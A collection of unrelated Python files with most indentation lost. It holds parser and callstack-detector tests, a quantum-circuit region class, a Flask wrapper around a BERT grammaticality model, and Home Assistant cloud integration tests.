tables = _parse_all_table_tags(soup)
assert len(tables) == 2
assert len(tables[0].find_all('tr')) == 270
assert len(tables[1].find_all('tr')) == 3
def test_parse_all_table_names():
soup = one_table_full_text_soup
titles = _parse_all_table_names(soup)
assert len(titles) == 1
assert type(titles[0]) == unicode
assert titles[0] == 'Drafted Players'
soup = complicated_soup
titles = _parse_all_table_names(soup)
assert len(titles) == 9
assert titles[1] == 'To Go'
assert titles[3] == 'Team Defense'
assert titles[8] == 'Individual Plays'
soup = multiple_headers_soup
titles = _parse_all_table_names(soup)
assert len(titles) == 1
assert titles[0] == 'Drafted Players'
soup = updated_table_soup
titles = _parse_all_table_names(soup)
assert len(titles) == 2
assert titles[0] == 'Drafted Players'
assert titles[1] == 'Supplemental Draft'
def test_parse_all_column_headers():
soup = one_table_full_text_soup
all_headers = _parse_all_column_headers(soup)
headers = all_headers[0]
assert headers[0].display_name == 'Rk'
assert headers[0].class_name == 'ranker'
assert headers[5].display_name == 'Pos'
assert headers[5].class_name == 'pos'
assert headers[7].display_name == 'Tm'
assert len(headers) == 32
soup = complicated_soup
all_headers = _parse_all_column_headers(soup)
assert len(all_headers) == 9
assert len(all_headers[0]) == 3
assert all_headers[0][0].display_name == 'Down'
assert all_headers[0][0].class_name is None
assert len(all_headers[2]) == 15
assert all_headers[2][0].display_name == 'Tm'
assert all_headers[2][0].class_name is None
assert all_headers[2][5].display_name == '1st%'
assert all_headers[2][5].class_name is None
assert len(all_headers[3]) == 15
assert len(all_headers[8]) == 14
assert all_headers[8][13].display_name is None
assert all_headers[8][13].class_name == 'exp_pts_diff'
soup = multiple_headers_soup
all_headers = _parse_all_column_headers(soup)
assert len(all_headers) == 1
headers = all_headers[0]
assert len(headers) == 32
assert headers[0].display_name == 'Rk'
assert headers[0].class_name == 'ranker'
assert headers[4].display_name is None
assert headers[4].class_name == 'player'
assert headers[30].display_name == 'College/Univ'
assert headers[30].class_name == 'college_id'
soup = updated_table_soup
all_headers = _parse_all_column_headers(soup)
assert len(all_headers) == 2
headers = all_headers[0]
assert len(headers) == 29
assert headers[0].display_name == 'Rnd'
assert headers[0].class_name == 'draft_round'
assert headers[3].display_name is None
assert headers[3].class_name == 'player'
def test_parse_all_data():
soup = one_table_full_text_soup
all_tables_rows, all_totals = _parse_all_data(soup)
rows = all_tables_rows[0]
assert len(rows) == 5
assert rows[0][0] == 1
assert type(rows[0][0]) == int
assert rows[0][7] == 'HOU'
assert type(rows[0][7]) == unicode
assert rows[2][1] == 2014
assert type(rows[2][1]) == int
assert rows[2][16] == '3-10-0'
assert type(rows[2][16]) == unicode
assert len(all_totals) == 1
assert all_totals[0] is None
soup = complicated_soup
all_tables_rows, all_totals = _parse_all_data(soup)
assert len(all_tables_rows) == 9
assert len(all_tables_rows[5]) == 13
assert len(all_tables_rows[7]) == 27
assert all_tables_rows[0][0][0] == 'First'
assert all_tables_rows[8][1][7] == 'SEA 45'
assert type(all_tables_rows[8][0][3]) == int
assert type(all_tables_rows[8][0][8]) == unicode
assert all_tables_rows[8][-1][4] == '11:49'
assert len([x for x in all_totals if x is not None]) == 7
assert all_totals[2][0] == 'Pct'
assert all_totals[0] is None
soup = multiple_headers_soup
all_tables_rows, all_totals = _parse_all_data(soup)
assert all_totals == [None]
assert len(all_tables_rows) == 1
assert len(all_tables_rows[0]) == 256
assert all_tables_rows[0][254][4] == 'Tyler Starr'
assert type(all_tables_rows[0][254][0]) == int
soup = updated_table_soup
all_tables_rows, all_totals = _parse_all_data(soup)
assert all_totals == [None, None]
assert len(all_tables_rows) == 2
table_rows = all_tables_rows[0]
assert len(table_rows) == 256
assert table_rows[0][3] == u'Jameis Winston'
assert table_rows[1][27] == 'Oregon'
assert type(table_rows[0][0]) == int
def test_parse_text():
# Test out one table, full text, not many results
tables = parse_text(one_table_full_text)
assert len(tables) == 1
assert 'Search Form' not in [x.title for x in tables]
test_table = tables[0]
assert test_table.title == 'Drafted Players'
assert len(test_table.headers) == 32
assert test_table.valid() is True
assert len(test_table) == 5
    # Testing out multiple headers
tables = parse_text(multiple_headers)
assert len(tables) == 1
assert tables[0].title == 'Drafted Players'
test_table = tables[0]
assert len(test_table.headers) == 32
assert test_table.valid() is True
assert len(test_table) == 256
assert test_table[254][4] == 'Tyler Starr'
assert test_table[0][4] == 'Jadeveon Clowney'
# Test out multiple tables real fast
tables = parse_text(complicated)
assert len(tables) == 9
for table in tables:
assert table.valid() is True
length_spec = [3, 4, 2, 2, 2, 13, 8, 27, 125]
for index, dummy in enumerate(length_spec):
assert len(tables[index]) == length_spec[index]
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from analysis import callstack_detectors
from analysis.analysis_testcase import AnalysisTestCase
from analysis.callstack_detectors import StartOfCallStack
from analysis.flag_manager import ParsingFlag
from analysis.flag_manager import FlagManager
from analysis.type_enums import CallStackFormatType
from analysis.type_enums import LanguageType
class CallStackDetectorTest(AnalysisTestCase):
def testAndroidJobDetector(self):
"""Tests that ``AndroidJobDetector`` detects android job callstack."""
stack_detector = callstack_detectors.AndroidJobDetector()
flag_manager = FlagManager()
flag_manager.Register('group',
ParsingFlag('java_main_stack_flag', value=True))
self.assertTupleEqual(
stack_detector('java.lang.IllegalStateException: blabla', flag_manager),
StartOfCallStack(0, CallStackFormatType.JAVA, LanguageType.JAVA, {}))
self.assertTupleEqual(
stack_detector('org.chromium.src.BlaBla', flag_manager),
StartOfCallStack(1, CallStackFormatType.JAVA, LanguageType.JAVA, {}))
self.assertTupleEqual(
stack_detector('Caused by:', flag_manager),
StartOfCallStack(1, CallStackFormatType.JAVA, LanguageType.JAVA, {}))
self.assertTupleEqual(
stack_detector('com.google.android.BlaBla', flag_manager),
StartOfCallStack(1, CallStackFormatType.JAVA, LanguageType.JAVA, {}))
self.assertIsNone(stack_detector('dummy', flag_manager))
def testSyzyasanDetector(self):
"""Tests that ``SyzyasanDetector`` detects sysyasn callstack."""
stack_detector = callstack_detectors.SyzyasanDetector()
self.assertTupleEqual(
stack_detector('Crash stack:'),
StartOfCallStack(0, CallStackFormatType.SYZYASAN, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('Allocation stack:'),
StartOfCallStack(1, CallStackFormatType.SYZYASAN, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy'))
def testTsanDetector(self):
"""Tests that ``TsanDetector`` detects thread sanitizer callstack."""
stack_detector = callstack_detectors.TsanDetector()
self.assertTupleEqual(
stack_detector('Read of size 1023:'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('WARNING: ThreadSanitizer'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('Previous read of size 102'),
StartOfCallStack(1, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('Location is heap block of size 3543'),
StartOfCallStack(1, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy'))
def testUbsanDetector(self):
"""Tests that ``UbsanDetector`` detects ubsan callstack."""
stack_detector = callstack_detectors.UbsanDetector()
flag_manager = FlagManager()
flag_manager.Register('group',
ParsingFlag('is_first_stack_flag', value=True))
self.assertTupleEqual(
stack_detector('blabla: runtime error: blabla', flag_manager),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
# After the ``is_first_stack_flag`` is set to False, the priority will be
# 1.
self.assertTupleEqual(
stack_detector('blabla: runtime error: blabla', flag_manager),
StartOfCallStack(1, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy', flag_manager))
def testMsanDetector(self):
"""Tests that ``MsanDetector`` detects memory sanitizer callstack."""
stack_detector = callstack_detectors.MsanDetector()
self.assertTupleEqual(
stack_detector('Uninitialized value was created by'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
    # A 'stored to' line marks a secondary stack, so its priority is 1.
self.assertTupleEqual(
stack_detector('Uninitialized value was stored to'),
StartOfCallStack(1, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('==123== ERROR:MemorySanitizer'),
StartOfCallStack(2, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy'))
def testAsanDetector(self):
"""Tests that ``AsanDetector`` detects address sanitizer callstack."""
stack_detector = callstack_detectors.AsanDetector()
self.assertTupleEqual(
stack_detector('==123== ERROR:AddressSanitizer'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('READ of size 32 at backtrace:'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('freed by thread T99 here:'),
StartOfCallStack(1, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('previously allocated by thread T1 here:'),
StartOfCallStack(1, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('Thread T9 created by'),
StartOfCallStack(1, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy'))
def testLibFuzzerDectector(self):
"""Tests that ``LibFuzzerDetector`` detects libFuzzer crash."""
stack_detector = callstack_detectors.LibFuzzerDetector()
self.assertTupleEqual(
stack_detector('==123==ERROR: libFuzzer'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy'))
def testDirectLeakDetector(self):
"""Tests that ``DirectLeakDectector`` detects ``Direct-Leak`` crash."""
stack_detector = callstack_detectors.DirectLeakDetector()
self.assertTupleEqual(
stack_detector(
'Direct leak of 8 byte(s) in 1 object(s) allocated from:'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy'))
def testIndirectLeakDetector(self):
"""Tests that ``IndirectLeakDectector`` detects ``Indirect-Leak`` crash."""
stack_detector = callstack_detectors.IndirectLeakDetector()
self.assertTupleEqual(
stack_detector('Indirect leak of 80 byte(s) in 1 object(s) allocated '
'from:'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy'))
def testChromeCrashDetector(self):
"""Tests that ``ChromeCrashDetector`` detects Fracas/Cracas callstack."""
stack_detector = callstack_detectors.ChromeCrashStackDetector()
self.assertTupleEqual(
stack_detector('CRASHED [EXC @ 0x508]'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('(JAVA) CRASHED [EXC @ 0x508]'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.JAVA, {}))
self.assertIsNone(stack_detector('dummy'))
def testGeneralSanitizerDetector(self):
"""Tests that ``GeneralSanitizerDetector`` returns a StartOfCallStack."""
stack_detector = callstack_detectors.GeneralSanitizerDetector()
self.assertTupleEqual(
stack_detector('==28956==ERROR: UndefinedBehaviorSanitizer:'),
StartOfCallStack(2, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('blabla...'))
def testCheckFailureDetector(self):
"""Tests that ``CheckFailureDetector`` detects check failure stack."""
stack_detector = callstack_detectors.CheckFailureDetector()
self.assertTupleEqual(
stack_detector(
'[FATAL:Vector.h(1829)] Check failed: position <= size()'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('blabla...'))
|
"""This module implements the CircuitRegion class."""
from __future__ import annotations
import logging
from typing import Any
from typing import Iterator
from typing import Mapping
from typing import Union
from typing_extensions import TypeGuard
from bqskit.ir.interval import CycleInterval
from bqskit.ir.interval import IntervalLike
from bqskit.ir.location import CircuitLocation
from bqskit.ir.point import CircuitPoint
from bqskit.ir.point import CircuitPointLike
from bqskit.utils.typing import is_integer
from bqskit.utils.typing import is_mapping
_logger = logging.getLogger(__name__)
class CircuitRegion(Mapping[int, CycleInterval]):
"""
The CircuitRegion class.
    A CircuitRegion is a contiguous, convex area in a circuit. It is
represented as a map from qudit indices to cycle intervals.
"""
def __init__(self, intervals: Mapping[int, IntervalLike]) -> None:
"""
CircuitRegion Initializer.
Args:
intervals (Mapping[int, IntervalLike]): A map from qudit
indices to cycle intervals. The cycle intervals can
be given as either a CycleInterval object or a tuple
of two ints that represent the lower and upper bound
of the inclusive interval.
Notes:
All cycle intervals are inclusive.
"""
if not is_mapping(intervals):
raise TypeError(
f'Expected mapping from int to IntervalLike, got {intervals}.',
)
for qudit, interval in intervals.items():
if not is_integer(qudit):
raise TypeError(f'Expected integer keys, got {qudit}.')
if not CycleInterval.is_interval(interval):
raise TypeError(
f'Expected valid CycleInterval, got {interval}.',
)
self._intervals = {
qudit: CycleInterval(interval)
for qudit, interval in intervals.items()
}
def __getitem__(self, key: int) -> CycleInterval:
"""
Return the interval given by the qudit `key`.
Raises:
IndexError: If `key` is not in this region.
"""
return self._intervals[key]
def __iter__(self) -> Iterator[int]:
"""Return an iterator for all qudits contained in the region."""
return iter(self._intervals)
def __len__(self) -> int:
"""Return the number of qudits in the region."""
return len(self._intervals)
@property
def min_cycle(self) -> int:
"""
Return the smallest cycle index for any qudit.
Raises:
ValueError: If `self` is empty.
"""
if self.empty:
raise ValueError('Empty region cannot have minimum cycle.')
return min(interval.lower for interval in self.values())
@property
def max_cycle(self) -> int:
"""
Return the largest cycle index for any qudit.
Raises:
ValueError: If `self` is empty.
"""
if self.empty:
raise ValueError('Empty region cannot have maximum cycle.')
return max(interval.upper for interval in self.values())
@property
def max_min_cycle(self) -> int:
"""
Return the largest cycle index for any lower bound.
Raises:
ValueError: If `self` is empty.
"""
if self.empty:
raise ValueError('Empty region cannot have minimum cycle.')
return max(interval.lower for interval in self.values())
@property
def min_max_cycle(self) -> int:
"""
Return the smallest cycle index for any upper bound.
Raises:
ValueError: If `self` is empty.
"""
if self.empty:
raise ValueError('Empty region cannot have maximum cycle.')
return min(interval.upper for interval in self.values())
@property
def min_qudit(self) -> int:
"""
Return the smallest qudit index.
Raises:
ValueError: If `self` is empty.
"""
if self.empty:
raise ValueError('Empty region cannot have minimum qudit.')
return min(self.keys())
@property
def max_qudit(self) -> int:
"""
Return the largest qudit index.
Raises:
ValueError: If `self` is empty.
"""
if self.empty:
raise ValueError('Empty region cannot have maximum qudit.')
return max(self.keys())
@property
def location(self) -> CircuitLocation:
"""Return the qudits this region includes as a CircuitLocation."""
return CircuitLocation(sorted(self.keys()))
@property
def points(self) -> list[CircuitPoint]:
"""Return the points described by this region."""
return [
CircuitPoint(cycle_index, qudit_index)
for qudit_index, intervals in self.items()
for cycle_index in intervals.indices
]
@property
def volume(self) -> int:
"""Return the volume of this region measured in qudit-cycles."""
return sum(len(interval) for interval in self.values())
@property
def width(self) -> int:
"""Return the number of cycles this region participates in."""
if self.empty:
return 0
return self.max_cycle - self.min_cycle + 1
@property
def empty(self) -> bool:
"""Return true if this region is empty."""
return len(self) == 0
def shift_left(self, amount_to_shift: int) -> CircuitRegion:
"""
Shift the region to the left by `amount_to_shift`.
Args:
amount_to_shift (int): Subtract `amount_to_shift` from all
cycle indices.
Raises:
ValueError: If the region would be shifted below zero as a
result of performing this operation.
"""
if not is_integer(amount_to_shift):
raise TypeError(
f'Expected integer for shift amount, got {amount_to_shift}.',
)
if self.empty:
return CircuitRegion(self._intervals)
if self.min_cycle - amount_to_shift < 0:
raise ValueError(
f'Cannot shift region to the left by {amount_to_shift}.',
)
return CircuitRegion({
qudit_index:
CycleInterval(
interval[0] - amount_to_shift,
interval[1] - amount_to_shift,
)
for qudit_index, interval in self._intervals.items()
})
def shift_right(self, amount_to_shift: int) -> CircuitRegion:
"""
Shift the region to the right by `amount_to_shift`.
Args:
amount_to_shift (int): Add `amount_to_shift` to all
cycle indices.
"""
if not is_integer(amount_to_shift):
raise TypeError(
f'Expected integer for shift amount, got {amount_to_shift}.',
)
if self.empty:
return CircuitRegion(self._intervals)
if amount_to_shift < 0:
return self.shift_left(-amount_to_shift)
return CircuitRegion({
qudit_index:
CycleInterval(
interval[0] + amount_to_shift,
interval[1] + amount_to_shift,
)
for qudit_index, interval in self._intervals.items()
})
def overlaps(self, other: CircuitPointLike | CircuitRegionLike) -> bool:
"""Return true if `other` overlaps this region."""
if CircuitPoint.is_point(other):
other = CircuitPoint(*other)
if other.qudit not in self:
return False
intervals = self[other.qudit]
return intervals.lower <= other.cycle <= intervals.upper
if CircuitRegion.is_region(other):
other = CircuitRegion(other)
if other.empty or self.empty:
return False
if self.min_cycle > other.max_cycle:
return False
if self.max_cycle < other.min_cycle:
return False
qudit_intersection = self.location.intersection(other.location)
if len(qudit_intersection) == 0:
return False
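            # Two closed intervals [a, b] and [c, d] overlap iff a <= d and b >= c.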
for qudit in qudit_intersection:
if (
self[qudit].lower <= other[qudit].upper
and self[qudit].upper >= other[qudit].lower
):
return True
return False
raise TypeError(
'Expected either CircuitPoint or CircuitRegion, got %s.'
% type(other),
)
def __contains__(self, other: object) -> bool:
if is_integer(other):
return other in self._intervals.keys()
if CircuitPoint.is_point(other):
return other[1] in self.keys() and other[0] in self[other[1]]
if CircuitRegion.is_region(other):
other = CircuitRegion(other)
if other.empty:
return True
if self.empty:
return False
return (
all(qudit in self.keys() for qudit in other.keys())
and all(
self[qudit].lower <= other[qudit][0] <= self[qudit].upper
for qudit in other.keys()
)
and all(
self[qudit].lower <= other[qudit][1] <= self[qudit].upper
for qudit in other.keys()
)
)
        # NotImplemented is truthy, so returning it from __contains__ would make
        # unsupported types appear to be members; report absence instead.
        return False
def transpose(self) -> dict[int, list[int]]:
"""Flip region to map cycle indices to qudit indices."""
if self.empty:
return {}
qudit_cycles: dict[int, list[int]] = {
i: []
for i in range(self.min_cycle, self.max_cycle + 1)
}
for qudit_index, intervals in sorted(self.items()):
for cycle_index in range(intervals.lower, intervals.upper + 1):
qudit_cycles[cycle_index].append(qudit_index)
return {k: v for k, v in qudit_cycles.items() if len(v) > 0}
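    # e.g. CircuitRegion({0: (1, 2), 1: (2, 3)}).transpose() == {1: [0], 2: [0, 1], 3: [1]}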
    def intersection(self, other: CircuitRegionLike) -> CircuitRegion:
        """Return the region where `self` and `other` overlap."""
if not CircuitRegion.is_region(other):
raise TypeError(f'Expected CircuitRegion, got {type(other)}.')
other = CircuitRegion(other)
location = self.location.intersection(other.location)
region: dict[int, CycleInterval] = {}
for qudit in location:
if self[qudit].overlaps(other[qudit]):
region[qudit] = self[qudit].intersection(other[qudit])
return CircuitRegion(region)
    def union(self, other: CircuitRegionLike) -> CircuitRegion:
        """Return the region covering every qudit-cycle in `self` or `other`."""
if not CircuitRegion.is_region(other):
raise TypeError(f'Expected CircuitRegion, got {type(other)}.')
other = CircuitRegion(other)
location = self.location.union(other.location)
region: dict[int, CycleInterval] = {}
for qudit in location:
if qudit in self and qudit in other:
region[qudit] = self[qudit].union(other[qudit])
elif qudit in self:
region[qudit] = self[qudit]
elif qudit in other:
region[qudit] = other[qudit]
return CircuitRegion(region)
def depends_on(self, other: CircuitRegionLike) -> bool:
"""Return true if self depends on other."""
if not isinstance(other, CircuitRegion):
other = CircuitRegion(other)
intersection = self.location.intersection(other.location)
if len(intersection) != 0:
return all(other[qudit] < self[qudit] for qudit in intersection)
return False
def dependency(self, other: CircuitRegionLike) -> int:
"""
Return 1 if self depends on other.
Return -1 if other depends on self. Return 0 if no dependency.
"""
if not isinstance(other, CircuitRegion):
other = CircuitRegion(other)
intersection = self.location.intersection(other.location)
if not intersection:
return 0
for qudit in intersection:
if other[qudit] < self[qudit]:
return 1
return -1
def __eq__(self, other: object) -> bool:
if CircuitRegion.is_region(other):
other = CircuitRegion(other)
return sorted(self.items()) == sorted(other.items())
return NotImplemented
def __hash__(self) -> int:
return tuple(sorted(self.items())).__hash__()
def __str__(self) -> str:
return str(self._intervals)
def __repr__(self) -> str:
return repr(self._intervals)
def __lt__(self, other: object) -> bool:
if CircuitPoint.is_point(other):
other = CircuitPoint(*other)
if other[0] < self.min_cycle:
return True
if other[1] in self.keys():
return other[0] < self[other[1]].lower
elif CircuitRegion.is_region(other):
other = CircuitRegion(other)
if len(self.location.intersection(other.location)) != 0:
lt = None
for qudit in self.location.intersection(other.location):
if lt is None:
lt = self[qudit] < other[qudit]
elif lt != (self[qudit] < other[qudit]):
raise ValueError('Both regions depend on each other.')
assert lt is not None
return lt
lower_intervals = tuple(sorted({x.lower for x in self.values()}))
other_lower_intervals = tuple(
sorted({x.lower for x in other.values()}),
)
upper_intervals = tuple(
reversed(sorted({x.upper for x in self.values()})),
)
other_upper_intervals = tuple(
reversed(sorted({x.upper for x in other.values()})),
)
return (lower_intervals, upper_intervals) < (
other_lower_intervals, other_upper_intervals,
)
return NotImplemented
@staticmethod
def is_region(region: Any) -> TypeGuard[CircuitRegionLike]:
"""Return true if region is a CircuitRegionLike."""
if isinstance(region, CircuitRegion):
return True
if not is_mapping(region):
_logger.debug('Region is not a mapping.')
return False
if not all(is_integer(key) for key in region.keys()):
_logger.debug('Region does not have integer keys.')
return False
if not all(CycleInterval.is_interval(val) for val in region.values()):
_logger.debug('Region does not have IntervalLike values.')
return False
return True
CircuitRegionLike = Union[Mapping[int, IntervalLike], CircuitRegion]
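# A minimal usage sketch (region contents are illustrative):
#     region = CircuitRegion({0: (2, 4), 1: (3, 5)})
#     region.min_cycle        # 2
#     region.max_cycle        # 5
#     region.width            # 4 cycles (2 through 5 inclusive)
#     region.volume           # 6 qudit-cycles: 3 on qudit 0, 3 on qudit 1
#     region.shift_right(2)   # CircuitRegion({0: (4, 6), 1: (5, 7)})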
|
# -*- coding: utf-8 -*-
import argparse
import json
import requests
import tokenization
from flask import Flask
from flask import request, jsonify
import numpy as np
app = Flask(__name__)
app.config['JSON_AS_ASCII'] = False
headers = {
'content-type': "application/json",
'cache-control': "no-cache"
}
cola_label_list = ["ungrammatical", "grammatical"]
def _truncate_seq_pair(tokens_a, tokens_b, max_length):
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
def convert_single_example(max_seq_length,
tokenizer, text_a, text_b=None):
tokens_a = tokenizer.tokenize(text_a)
tokens_b = None
if text_b:
        tokens_b = tokenizer.tokenize(text_b)  # for Chinese this mainly splits the text into characters
if tokens_b:
_truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)
else:
if len(tokens_a) > max_seq_length - 2:
tokens_a = tokens_a[0:(max_seq_length - 2)]
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
if tokens_b:
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
    input_ids = tokenizer.convert_tokens_to_ids(tokens)  # map tokens to vocabulary ids
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
    return input_ids, input_mask, segment_ids  # these correspond to the input_ids, input_mask and segment_ids inputs of the BERT model
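# Illustrative sketch (hypothetical single-sentence input, max_seq_length=8):
#     tokens:      [CLS] tok_1 tok_2 [SEP]            (then padded to length 8)
#     input_ids:   [id_cls, id_1, id_2, id_sep, 0, 0, 0, 0]
#     input_mask:  [1, 1, 1, 1, 0, 0, 0, 0]
#     segment_ids: [0, 0, 0, 0, 0, 0, 0, 0]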
# vocabulary file of the pretrained (or self-trained) model
vocab_file = "bert_tiny/vocab.txt"
token = tokenization.FullTokenizer(vocab_file=vocab_file)
def detect_bert(content):
input_ids, input_mask, segment_ids = convert_single_example(128, token, content)
features = {}
features["input_ids"] = input_ids
features["input_mask"] = input_mask
features["segment_ids"] = segment_ids
features["label_ids"] = 0
data_list = []
data_list.append(features)
data = json.dumps({"signature_name": "serving_default", "instances": data_list})
headers = {"content-type": "application/json"}
    # adjust the service ip, port and model_name to match your deployment
json_response = requests.post('http://0.0.0.0:8809/v1/models/cola:predict', data=data, headers=headers)
print(data, json_response.text)
json_response_text = json.loads(json_response.text)
model_result = {}
for (i, class_label) in enumerate(cola_label_list):
        model_result[class_label] = json_response_text['predictions'][0][i]
    classify_result = {}
arg_max_ind = np.argmax(json_response_text['predictions'][0])
classify_result['name'] = cola_label_list[arg_max_ind]
classify_result['score'] = json_response_text['predictions'][0][arg_max_ind]
result = {}
result['modelResult'] = model_result
result['classifyResult'] = classify_result
    # return the raw dict; the /classify route wraps it in jsonify()
    return result
@app.route('/classify', methods=['GET'])
def detect():
    if 'id' not in request.args.keys():
        raise Exception('task id is empty')
    if 'query' not in request.args.keys():
        raise Exception('query is empty')
query = request.args.get("query")
id = request.args.get('id', 'cola')
if id != 'cola':
raise Exception('Task-id is not cola')
    return jsonify(detect_bert(query))
if __name__ == '__main__':
app.run(host='0.0.0.0')
# http://ip:port/classify?id=cola&query=hello
|
"""Test the cloud.iot module."""
from unittest.mock import MagicMock, patch
from aiohttp import web
import pytest
from homeassistant.components.cloud import DOMAIN
from homeassistant.components.cloud.client import CloudClient
from homeassistant.components.cloud.const import PREF_ENABLE_ALEXA, PREF_ENABLE_GOOGLE
from homeassistant.core import State
from homeassistant.setup import async_setup_component
from . import mock_cloud, mock_cloud_prefs
from tests.common import mock_coro
from tests.components.alexa import test_smart_home as test_alexa
@pytest.fixture
def mock_cloud_inst():
"""Mock cloud class."""
return MagicMock(subscription_expired=False)
async def test_handler_alexa(hass):
"""Test handler Alexa."""
hass.states.async_set("switch.test", "on", {"friendly_name": "Test switch"})
hass.states.async_set("switch.test2", "on", {"friendly_name": "Test switch 2"})
await mock_cloud(
hass,
{
"alexa": {
"filter": {"exclude_entities": "switch.test2"},
"entity_config": {
"switch.test": {
"name": "Config name",
"description": "Config description",
"display_categories": "LIGHT",
}
},
}
},
)
mock_cloud_prefs(hass)
cloud = hass.data["cloud"]
resp = await cloud.client.async_alexa_message(
test_alexa.get_new_request("Alexa.Discovery", "Discover")
)
endpoints = resp["event"]["payload"]["endpoints"]
assert len(endpoints) == 1
device = endpoints[0]
assert device["description"] == "Config description via Home Assistant"
assert device["friendlyName"] == "Config name"
assert device["displayCategories"] == ["LIGHT"]
assert device["manufacturerName"] == "Home Assistant"
async def test_handler_alexa_disabled(hass, mock_cloud_fixture):
"""Test handler Alexa when user has disabled it."""
mock_cloud_fixture._prefs[PREF_ENABLE_ALEXA] = False
cloud = hass.data["cloud"]
resp = await cloud.client.async_alexa_message(
test_alexa.get_new_request("Alexa.Discovery", "Discover")
)
assert resp["event"]["header"]["namespace"] == "Alexa"
assert resp["event"]["header"]["name"] == "ErrorResponse"
assert resp["event"]["payload"]["type"] == "BRIDGE_UNREACHABLE"
async def test_handler_google_actions(hass):
"""Test handler Google Actions."""
hass.states.async_set("switch.test", "on", {"friendly_name": "Test switch"})
hass.states.async_set("switch.test2", "on", {"friendly_name": "Test switch 2"})
hass.states.async_set("group.all_locks", "on", {"friendly_name": "Evil locks"})
await mock_cloud(
hass,
{
"google_actions": {
"filter": {"exclude_entities": "switch.test2"},
"entity_config": {
"switch.test": {
"name": "Config name",
"aliases": "Config alias",
"room": "living room",
}
},
}
},
)
mock_cloud_prefs(hass)
cloud = hass.data["cloud"]
reqid = "5711642932632160983"
data = {"requestId": reqid, "inputs": [{"intent": "action.devices.SYNC"}]}
with patch(
"hass_nabucasa.Cloud._decode_claims",
return_value={"cognito:username": "myUserName"},
):
await cloud.client.get_google_config()
resp = await cloud.client.async_google_message(data)
assert resp["requestId"] == reqid
payload = resp["payload"]
assert payload["agentUserId"] == "myUserName"
devices = payload["devices"]
assert len(devices) == 1
device = devices[0]
assert device["id"] == "switch.test"
assert device["name"]["name"] == "Config name"
assert device["name"]["nicknames"] == ["Config name", "Config alias"]
assert device["type"] == "action.devices.types.SWITCH"
assert device["roomHint"] == "living room"
async def test_handler_google_actions_disabled(hass, mock_cloud_fixture):
"""Test handler Google Actions when user has disabled it."""
mock_cloud_fixture._prefs[PREF_ENABLE_GOOGLE] = False
with patch("hass_nabucasa.Cloud.start", return_value=mock_coro()):
assert await async_setup_component(hass, "cloud", {})
reqid = "5711642932632160983"
data = {"requestId": reqid, "inputs": [{"intent": "action.devices.SYNC"}]}
cloud = hass.data["cloud"]
resp = await cloud.client.async_google_message(data)
assert resp["requestId"] == reqid
assert resp["payload"]["errorCode"] == "deviceTurnedOff"
async def test_webhook_msg(hass):
"""Test webhook msg."""
with patch("hass_nabucasa.Cloud.start", return_value=mock_coro()):
setup = await async_setup_component(hass, "cloud", {"cloud": {}})
assert setup
cloud = hass.data["cloud"]
await cloud.client.prefs.async_initialize()
await cloud.client.prefs.async_update(
cloudhooks={
"hello": {"webhook_id": "mock-webhook-id", "cloudhook_id": "mock-cloud-id"}
}
)
received = []
async def handler(hass, webhook_id, request):
"""Handle a webhook."""
received.append(request)
return web.json_response({"from": "handler"})
hass.components.webhook.async_register("test", "Test", "mock-webhook-id", handler)
response = await cloud.client.async_webhook_message(
{
"cloudhook_id": "mock-cloud-id",
"body": '{"hello": "world"}',
"headers": {"content-type": "application/json"},
"method": "POST",
"query": None,
}
)
assert response == {
"status": 200,
"body": '{"from": "handler"}',
"headers": {"Content-Type": "application/json"},
}
assert len(received) == 1
assert await received[0].json() == {"hello": "world"}
async def test_google_config_expose_entity(hass, mock_cloud_setup, mock_cloud_login):
